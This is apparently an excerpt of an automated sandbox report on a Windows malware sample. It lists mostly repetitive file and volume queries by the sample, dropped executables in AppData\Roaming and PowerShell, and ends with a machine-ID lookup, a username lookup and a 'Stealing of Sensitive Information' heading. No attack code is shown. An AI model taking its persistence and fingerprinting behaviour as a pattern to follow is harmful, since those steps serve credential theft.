Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Users\user\Desktop\PSFBGrvmxy.exe | Queries volume information: C:\Users\user\Desktop\PSFBGrvmxy.exe VolumeInformation
Source: C:\Users\user\Desktop\PSFBGrvmxy.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\Desktop\PSFBGrvmxy.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
Source: C:\Users\user\Desktop\PSFBGrvmxy.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\Desktop\PSFBGrvmxy.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\Desktop\PSFBGrvmxy.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Users\user\Desktop\PSFBGrvmxy.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
Source: C:\Users\user\Desktop\PSFBGrvmxy.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\Xnckpwz\Vlrvln.exe | Queries volume information: C:\Users\user\AppData\Roaming\Xnckpwz\Vlrvln.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\Xnckpwz\Vlrvln.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\Xnckpwz\Vlrvln.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\Xnckpwz\Vlrvln.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\Xnckpwz\Vlrvln.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\Xnckpwz\Vlrvln.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\Xnckpwz\Vlrvln.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\Xnckpwz\Vlrvln.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\Xnckpwz\Vlrvln.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\Xnckpwz\Vlrvln.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\Xnckpwz\Vlrvln.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\Xnckpwz\Vlrvln.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exe | Queries volume information: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Users\user\AppData\Roaming\Xnckpwz\Vlrvln.exe | Queries volume information: C:\Users\user\AppData\Roaming\Xnckpwz\Vlrvln.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\Xnckpwz\Vlrvln.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\Xnckpwz\Vlrvln.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\Xnckpwz\Vlrvln.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\Xnckpwz\Vlrvln.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\Xnckpwz\Vlrvln.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\Xnckpwz\Vlrvln.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\Xnckpwz\Vlrvln.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\Xnckpwz\Vlrvln.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\Xnckpwz\Vlrvln.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\Xnckpwz\Vlrvln.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\Xnckpwz\Vlrvln.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exe | Queries volume information: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                Source: C:\Users\user\AppData\Roaming\Xnckpwz\Vlrvln.exeQueries volume information: C:\Users\user\AppData\Roaming\Xnckpwz\Vlrvln.exe VolumeInformation
                Source: C:\Users\user\AppData\Roaming\Xnckpwz\Vlrvln.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                Source: C:\Users\user\AppData\Roaming\Xnckpwz\Vlrvln.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
                Source: C:\Users\user\AppData\Roaming\Xnckpwz\Vlrvln.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeQueries volume information: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exe VolumeInformation
                Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                Source: C:\Users\user\Desktop\PSFBGrvmxy.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                Source: C:\Users\user\Desktop\PSFBGrvmxy.exeCode function: 3_2_02C4F6D0 GetUserNameW,3_2_02C4F6D0

                Stealing of Sensitive Information

